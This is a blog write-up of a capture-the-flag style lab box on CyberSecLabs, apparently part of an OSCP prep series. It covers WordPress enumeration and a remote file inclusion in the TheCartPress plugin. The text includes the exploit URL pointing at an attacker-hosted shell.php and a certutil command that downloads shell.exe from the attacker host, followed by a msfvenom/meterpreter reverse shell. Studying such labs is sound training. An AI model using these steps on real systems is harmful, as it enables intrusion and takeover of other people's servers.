Close
Writeup – CSL – Boats

Writeup – CSL – Boats

So the Boats box is a neat one, and I thoroughly enjoyed my first attempt at it live on Twitch the other day. Let’s dive right in and get after this!

Windows box on CSL!

Once we add the ip address to our /etc/hosts file, let’s get after this box with a good ol’ AutoRecon scan and check out the results. We see a bunch of ports open, including port 80, so while the scan is running, we can go check there.

Looks like a WordPress site to me!

Now, anytime I see a WordPress site, I get excited. And any time I see a potential plugin, I get even more excited. See that shopping cart label in the top right? That’s where I get excited.

So I kicked off a wpscan, and didn’t find anything, but I know there’s a plugin, so I clicked on the shopping cart and viewed the source. I see a plugin called “The Cart Press.” Let’s find vulnerabilities.

JAMES is a username!
thecartpress, I see!

Over on Exploit Database, we see a few. The Remote File Inclusion one really piques my interest. Remote file inclusion will require us to host our own file to be called out by the vulnerability. Let’s hope we are on the right version and give it a shot!

Remote File Inclusion!

Next step is to download one of my favorite remote shells and host it on a simple HTTP Server. I use the shell from https://github.com/namansahore/Remote-File-Inclusion-Shell. I highly recommend it (P.S., it’s forked on my repository as well!). Host that in the directory of your choice (I named mine shell.php) and fire up a simpleHTTPServer (I used sudo and did it on port 80).

http://172.31.1.14/wp-content/plugins/thecartpress/checkout/CheckoutEditor.php?tcp_save_fields=true&tcp_class_name=asdf&tcp_class_path=http://10.10.0.11/shell.php

Boom, that was where I browsed to from Exploit-DB, and below is what you get when you pop my favorite remote file!

At this point the remote shell won’t work, but you can issue windows commands like dir to verify you have control. A great command to use in this case is certutil, and you can upload files utilizing it.

First step, make a payload using msfvenom. I utilize the cheatsheet over at https://infinitelogins.com/2020/01/25/msfvenom-reverse-shell-payload-cheatsheet/ to make my payloads.

Second, ensure your new shell.exe file is being hosted by your SimpleHTTPServer, and upload it with certutil. Here is the command line that worked for me: certutil -f http://10.10.0.11/shell.exe shell.exe

shell.exe uploaded successfully!

At this point, use msfconsole to kick off a meterpreter listener, as shown below, and run that shell.exe command! It’s going to be slow to connect, but once it does, you will be nt authority/system and be able to go get your flags!

Here’s our listener, and below kicks off the shell.exe!
Boom! We own the box!

Thanks for catching the next writeup in my OSCP Prep series of writeups for CyberSecLabs! Stay tuned for the YouTube video to follow! And as always, keep hacking!